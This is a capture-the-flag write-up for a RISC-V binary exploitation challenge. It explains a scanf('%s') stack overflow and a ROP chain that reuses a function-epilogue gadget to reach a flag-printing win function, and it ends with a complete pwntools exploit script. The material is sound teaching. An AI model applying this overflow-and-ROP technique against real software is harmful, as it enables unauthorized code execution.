Riscy Business 2

By Sibech, 0-Day Aarhus

An even riskier program!

nc challs.crate.nu 40002

Solves: 14

Prelude

This is a write-up for a binary exploitation challenge at Crate-CTF 2025. The challenge is a follow-up to a challenge from Crate-CTF 2024, where I sadly didn't participate.

Prior to this I hadn't had any experience exploiting binaries for the RISC-V architecture. I learned a lot about the architecture, and also got to leverage some knowledge about compiler design.

Getting acquainted

We'll start by running file on the binary to get an idea of what we are working with.

$ file riscy_business2
riscy_business2: ELF 64-bit LSB executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), statically linked, BuildID[sha1]=26b7f5c80199480fb669e23d85f0f79350433dbb, for GNU/Linux 4.15.0, not stripped

It's a 64-bit little-endian ELF binary compiled for the RISC-V architecture. Symbols aren't stripped from it, so debugging won't be tedious.

Notably, the binary is statically linked, so the usual code execution vectors through a shared libc aren't available, unless of course the binary itself pulls in the relevant functions. What static linking does give us is a lot of potential ROP gadgets inside the binary itself. Code that would normally require a libc leak is reachable with just a PIE leak, or with no leak at all if PIE is disabled.

Next up, let's use checksec to see what mitigations are enabled.

$ pwn checksec riscy_business2
    Arch:       riscv64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x10000)
    Stripped:   No

NX is enabled, so shellcode shenanigans are off the table. The writable GOT and the stack canary didn't end up being relevant. Most importantly, PIE happens to be disabled. We won't need a PIE leak to use the gadgets.

Time to decompile and take a look at what the program does. Starting with main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4[264]; // [sp+0h] [-108h] BYREF

    setvbuf(stdout, 0LL, 2LL, 0LL);
    printf("Hello again, what's your name?\n> ");
    if ( _isoc99_scanf("%s", v4) != 1 )
        _assert_fail("scanf(\"%s\", buf) == 1", "riscy_business2.c");
    printf("Nice to meet you %s, but now I must go.\n", v4);
    return 0;
}

Not really much going on here. There's a pretty trivial buffer overflow: the %s conversion has no field width, so scanf keeps writing input into the fixed-size buffer v4 until it hits a whitespace character (space, \n, \t etc.).
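To make the overflow condition concrete, here is a rough Python model of what a bare %s conversion stores. It is only a sketch: the function name scanf_s_model and the whitespace set (the bytes isspace() accepts in the default C locale) are my own choices for illustration, not something taken from the challenge source.

```python
# Bytes that C's isspace() treats as whitespace in the default "C" locale.
C_WHITESPACE = b" \t\n\v\f\r"

BUF_SIZE = 264  # size of v4 in the decompiled main


def scanf_s_model(stream: bytes) -> bytes:
    """Hypothetical model: return the bytes a bare %s would write for this input."""
    i = 0
    # %s first skips any leading whitespace...
    while i < len(stream) and stream[i] in C_WHITESPACE:
        i += 1
    start = i
    # ...then copies bytes until the next whitespace byte or the end of input.
    while i < len(stream) and stream[i] not in C_WHITESPACE:
        i += 1
    # A terminating NUL byte is written after the copied bytes.
    return stream[start:i] + b"\x00"


stored = scanf_s_model(b"A" * 300 + b"\n")
print(len(stored) > BUF_SIZE)  # True: the write runs past the end of v4
```

Note that NUL bytes are not in the whitespace set, so in this model they are copied like any other byte. That matters later, since 64-bit addresses packed into the payload are mostly zero bytes.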

Interestingly, main doesn't have a stack canary. My guess is some of the statically linked libc functions have canaries, which is what checksec ended up detecting.

Turns out there's also a win function,

void __fastcall __noreturn win(__int64 a1, __int64 a2, __int64 a3)
{
    const char *v6; // a0

    v6 = (const char *)getenv("FLAG");
    if ( !v6 )
        v6 = "Did not find a flag :(";
    if ( a1 == 123 && a2 == 321 && a3 == 2 )
        puts(v6);
    exit(0LL);
}

So we get the flag by redirecting execution to win and setting the three arguments to 123, 321, and 2 according to the RISC-V calling convention.

We can't cheese the parameter check by jumping straight past it, because then getenv("FLAG") never runs and puts has no pointer to the flag to print.

Running and debugging

Let's get set up now that we have an idea of what needs to happen. First we'll need to set the FLAG environment variable. In bash this is done like so,

$ export FLAG=cratectf{testflag}

Through some dark magic I am unaware of, I can run the binary directly on an x86-64 machine, but GDB is not happy about it, so we'll set up some infrastructure.

Kudos if you already have a RISC-V machine.

We'll use QEMU to emulate RISC-V and GDB multiarch to debug it. For good measure, let's also get the binutils. As I'm on Ubuntu, the needed packages are easily available with apt.

$ sudo apt install gdb-multiarch qemu-user qemu-user-static binutils-riscv64-linux-gnu

After installing, we can run the binary with a GDB server enabled. QEMU will pause the program and wait for GDB to attach on port 1234.

$ qemu-riscv64 -g 1234 ./riscy_business2

I made a file, init, which contains a GDB script that sets the architecture, connects to the GDB server and creates a breakpoint on main.

init-pwndbg
set architecture riscv:rv64
target remote :1234
b main

I've set up init-pwndbg to start pwndbg through GDB.

And now, finally, we can debug.

$ gdb-multiarch riscy_business2 -x init

Getting PC control

From earlier we know there's a buffer overflow in main. main terminates by loading the return-address from the stack and jumping to it.

0000000000010632 <main>:
    . . .
    1067a:    60b2                    ld    ra,264(sp)
    1067c:    6151                    addi    sp,sp,272
    1067e:    8082                    ret
    . . .

ret is a pseudoinstruction for jalr zero, ra, 0, which loads the value stored in the return-address register ra into the program counter pc.

Utilizing the buffer overflow we can overwrite the saved return-address on the stack, and redirect the program to wherever we want.
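As a minimal sketch of that first step, the payload below only takes control of pc. The offset 264 comes from the `ld ra,264(sp)` in main's epilogue and the target is the address of win from the disassembly. I use struct.pack("<Q", ...) from the standard library here, which produces the same bytes as pwntools' p64 for a little-endian 64-bit value. The helper name pc_control_payload is made up for this example.

```python
import struct

BUF_TO_RA = 264  # offset from the start of v4 to the saved ra: ld ra,264(sp)
WIN = 0x1069E    # address of win, taken from the disassembly


def pc_control_payload(target: int) -> bytes:
    """Pad up to the saved return address, then overwrite it with target."""
    padding = b"A" * BUF_TO_RA
    return padding + struct.pack("<Q", target)


payload = pc_control_payload(WIN)
print(len(payload))        # 272
print(payload[-8:].hex())  # 9e06010000000000
```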

*PC   0x1069e (win) ◂— c.addi sp, -0x20

Gadget hunting

Well, we can call win, but the registers aren't set correctly. To set them we're gonna have to do some ROP. Apparently, ROPgadget has support for the RISC-V architecture, so I spent a while trying to find gadgets with it without any luck.

Turns out that finding gadgets that mutate any of the function argument registers a0-a7, and also don't derail the chain, for example with a relative jump, is excruciatingly difficult.

Quick compiler-design tangent to explain why this happens.

When a function wants to call another function, it must place the call's arguments into registers according to the calling convention, in our case a0-a7. But these registers may still contain arguments belonging to the current function. Semantically, those arguments are in scope for the entire duration of the function. The compiler can't just overwrite them without first saving the values somewhere else.

What if a function makes multiple calls? Repeatedly saving and restoring the argument registers around every call would be inefficient. So instead, at the very beginning of the function, the compiler saves the old contents of some callee-saved registers (s0-s11 for RISC-V) on the stack together with ra, and then copies the arguments into those registers, where they survive any calls. This is called the function prologue.

Before returning from the function, in what's called the function epilogue, every callee-saved register that was used is restored by loading the stored values back from the stack. The epilogue is also responsible for loading the saved return address.

As a result, most instructions that write to a0-a7 sit right before a call to another function, and following that call is likely to make us lose control of the program. Luckily, we can take advantage of the prologue/epilogue structure instead.

If we take a look at the disassembly for win, we can see that the registers it really compares against are s0, s1 and s2.

000000000001069e <win>:
    1069e:    1101                    addi    sp,sp,-32
    106a0:    ec06                    sd    ra,24(sp)
    106a2:    e822                    sd    s0,16(sp)
    106a4:    e426                    sd    s1,8(sp)
    106a6:    e04a                    sd    s2,0(sp)
    106a8:    842a                    mv    s0,a0
    106aa:    84ae                    mv    s1,a1
    106ac:    8932                    mv    s2,a2
    ...
    106bc:    07b00793              li    a5,123
    106c0:    00f40a63              beq    s0,a5,106d4 <win+0x36>
    ...
    106d4:    14100793              li    a5,321
    106d8:    fef496e3              bne    s1,a5,106c4 <win+0x26>
    ...
    106dc:    4789                    li    a5,2
    106de:    fef913e3              bne    s2,a5,106c4 <win+0x26>
    106e2:    51d0e0ef              jal    1f3fe <_IO_puts>
    ...

So instead of a0, a1 and a2 we can just set s0, s1 and s2. What would be the perfect gadget for that? A function epilogue!

The compiler didn't generate an epilogue for win, since win always ends by calling exit and never returns. Let's go digging for one in other parts of the binary. In this scenario I find it easier to just dump all the disassembly and manually search for a suitable one instead of using ROPgadget.

$ riscv64-linux-gnu-objdump -d ./riscy_business2 > gadgets.s
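I searched the dump by hand, but the same search can be sketched in a few lines of Python. The script below is an illustration under assumptions, not what I actually ran: it assumes the objdump line layout shown in this write-up (address, raw encoding, mnemonic, operands) and only recognizes epilogues of the form "ld ..., addi sp,sp,N, ret". The names parse and find_epilogues are made up for the example, and SAMPLE stands in for the contents of gadgets.s.

```python
import re

# address: raw-encoding mnemonic operands
INSN = re.compile(r"^\s*([0-9a-f]+):\s+([0-9a-f]+)\s+(\S+)\s*(.*)$")
# operands of a stack load such as "ra,24(sp)"
LOAD = re.compile(r"^(\w+),(-?\d+)\(sp\)$")


def parse(dump: str):
    """Turn objdump text into a list of (address, mnemonic, operands)."""
    insns = []
    for line in dump.splitlines():
        m = INSN.match(line)
        if m:
            insns.append((int(m.group(1), 16), m.group(3), m.group(4).strip()))
    return insns


def find_epilogues(dump: str, wanted=("ra", "s0", "s1", "s2")):
    """Find 'ld ...; addi sp,sp,N; ret' runs that restore every wanted register."""
    insns = parse(dump)
    hits = []
    for i, (_, mnem, _) in enumerate(insns):
        if mnem != "ret" or i == 0:
            continue
        prev = insns[i - 1]
        if prev[1] != "addi" or not prev[2].startswith("sp,sp,"):
            continue
        # Walk backwards over the consecutive stack loads before the addi.
        loads = {}
        j = i - 2
        while j >= 0 and insns[j][1] == "ld":
            m = LOAD.match(insns[j][2])
            if not m:
                break
            loads[m.group(1)] = int(m.group(2))
            j -= 1
        if all(reg in loads for reg in wanted):
            hits.append((insns[j + 1][0], loads))
    return hits


SAMPLE = """
   1067a:    60b2                    ld    ra,264(sp)
   1067c:    6151                    addi    sp,sp,272
   1067e:    8082                    ret
   138be:    60e2                    ld    ra,24(sp)
   138c0:    6442                    ld    s0,16(sp)
   138c2:    64a2                    ld    s1,8(sp)
   138c4:    6902                    ld    s2,0(sp)
   138c6:    6105                    addi    sp,sp,32
   138c8:    8082                    ret
"""

for addr, loads in find_epilogues(SAMPLE):
    print(hex(addr), loads)  # reports the epilogue starting at 0x138be
```

To run it on the real dump, replace SAMPLE with the text read from gadgets.s. Epilogues that restore more registers than needed are reported too. They still work, but need a larger fake stack frame.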

Ended up finding this one quite quickly,

   138be:    60e2                    ld    ra,24(sp)
   138c0:    6442                    ld    s0,16(sp)
   138c2:    64a2                    ld    s1,8(sp)
   138c4:    6902                    ld    s2,0(sp)
   138c6:    6105                    addi    sp,sp,32
   138c8:    8082                    ret

Importantly, the address of the gadget doesn't contain a whitespace character, which was the restriction imposed by scanf on the overflow.
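This check is easy to automate for every value that goes into the chain. A small sketch, assuming the whitespace set of the default C locale. The helper name scanf_safe and the address 0x10a20 are made up for illustration; the latter is just an example of a value that would be cut short.

```python
import struct

# Bytes that C's isspace() treats as whitespace in the default "C" locale.
C_WHITESPACE = b" \t\n\v\f\r"


def scanf_safe(value: int) -> bool:
    """True if the little-endian 64-bit encoding contains no whitespace byte."""
    packed = struct.pack("<Q", value)
    return not any(byte in C_WHITESPACE for byte in packed)


print(scanf_safe(0x138BE))  # True: bytes are be 38 01 00 ...
print(scanf_safe(0x10A20))  # False: contains 0x20 (space) and 0x0a (newline)
```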

ROP'ing

With our new gadget in hand we can create our ROP chain. We'll overflow up to the saved return-address, then overwrite it with the address of our gadget. The gadget loads the next four values on the stack into s2, s1, s0 and ra respectively, so we'll write 2, 321, 123 and the address of win after the address of the gadget.
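The stack layout can be sanity-checked without an emulator by replaying the two epilogues by hand. The sketch below treats the start of v4 as sp+0, as in main's frame, and applies the loads from main's epilogue and then the gadget's. The function names are made up, and the final target 0x106ae is the entry point used in the exploit script at the end, slightly past the start of win.

```python
import struct

GADGET = 0x138BE
TARGET = 0x106AE  # entry point inside win used by the final script


def u64(mem: bytes, offset: int) -> int:
    """Read a little-endian 64-bit value, like ld does."""
    return struct.unpack_from("<Q", mem, offset)[0]


def simulate(payload: bytes):
    """Replay main's epilogue and then the gadget on the overflowed stack."""
    regs = {}
    sp = 0  # start of v4, which sits at sp+0 in main's frame
    # main: ld ra,264(sp); addi sp,sp,272; ret
    regs["ra"] = u64(payload, sp + 264)
    sp += 272
    jumps = [regs["ra"]]
    # gadget: ld ra,24(sp); ld s0,16(sp); ld s1,8(sp); ld s2,0(sp); addi sp,sp,32; ret
    regs["ra"] = u64(payload, sp + 24)
    regs["s0"] = u64(payload, sp + 16)
    regs["s1"] = u64(payload, sp + 8)
    regs["s2"] = u64(payload, sp + 0)
    sp += 32
    jumps.append(regs["ra"])
    return regs, jumps


payload = b"A" * 264 + b"".join(
    struct.pack("<Q", v) for v in (GADGET, 2, 321, 123, TARGET)
)
regs, jumps = simulate(payload)
print(regs["s0"], regs["s1"], regs["s2"])  # 123 321 2
print([hex(j) for j in jumps])             # ['0x138be', '0x106ae']
```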

But there's just one last problem. If we jump to the start of win, its prologue moves a0, a1 and a2 into s0, s1 and s2, overwriting the values we just loaded and failing the check. We can easily circumvent this by jumping further into the win function, to 0x106ae right after the three mv instructions, skipping the function prologue entirely.
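The entry point follows directly from the disassembly of win: the prologue consists of eight compressed instructions of two bytes each. A quick worked calculation, using the raw encodings exactly as listed by objdump:

```python
WIN = 0x1069E

# Raw encodings of win's first eight instructions, copied from the listing:
# addi sp / sd ra / sd s0 / sd s1 / sd s2 / mv s0,a0 / mv s1,a1 / mv s2,a2
PROLOGUE = ["1101", "ec06", "e822", "e426", "e04a", "842a", "84ae", "8932"]

# Two hex digits per byte, so each compressed instruction is 2 bytes long.
skip = sum(len(encoding) // 2 for encoding in PROLOGUE)
entry = WIN + skip

print(skip)        # 16
print(hex(entry))  # 0x106ae
```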

Delivering this payload to the remote we get,

[+] Opening connection to challs.crate.nu on port 40002: Done
[*] Switching to interactive mode
Hello again, what's your name?
> Nice to meet you AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8v\x03, but now I must go.
cratectf{ojojoj_funktionsepiloger_är_ju_sig_lika}
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to challs.crate.nu port 40002

Script

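from pwn import *

# Connect to the remote service, or run locally under QEMU.
# Locally, -g 1234 makes QEMU wait for GDB to attach on port 1234.
if args.REMOTE:
    io = remote("challs.crate.nu", 40002)
else:
    io = process(["qemu-riscv64", "-g", "1234", "./riscy_business2"])

win = 0x106ae     # win + 0x10: just past the prologue and the mv into s0-s2
gadget = 0x138be  # ld ra,24(sp); ld s0,16(sp); ld s1,8(sp); ld s2,0(sp); addi sp,sp,32; ret

p = b"A" * 264    # fill v4 up to main's saved return address
p += p64(gadget)  # main returns into the epilogue gadget
p += p64(0x2)     # 0(sp)  -> s2 = 2
p += p64(0x141)   # 8(sp)  -> s1 = 321
p += p64(0x7b)    # 16(sp) -> s0 = 123
p += p64(win)     # 24(sp) -> ra, so the gadget returns into win

io.sendline(p)

io.interactive()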